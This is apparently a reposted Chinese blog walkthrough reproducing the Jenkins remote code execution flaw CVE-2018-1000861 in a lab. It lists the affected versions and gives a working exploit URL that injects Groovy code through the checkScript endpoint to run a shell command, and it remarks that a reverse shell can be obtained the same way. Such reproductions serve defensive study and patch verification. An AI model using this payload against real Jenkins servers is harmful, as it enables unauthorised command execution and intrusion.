Jenkins远程命令执行漏洞(CVE-2018-1000861)


漏洞介绍

Stapler Web框架中的钉书机/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞,攻击者可以使用该方法调用某些方法通过访问并非旨在通过这种方式调用的特制URL来访问Java对象。

影响版本

Jenkins 2.153及更早版本,LTS 2.138.3及更早版本

复现过程

访问有Jenkins远程命令执行漏洞(CVE-2018-1000861)的网站首页

 

 构建特定的url进行命令执行,如在/tmp目录下创建shell文件

http://192.168.222.196:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/shell%22.execute()}}

执行之后可看到没有回显,看一下搭建漏洞环境的主机/tmp目录下成功创建shell文件

 

 

注意:可执行反弹shell的命令getshell

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM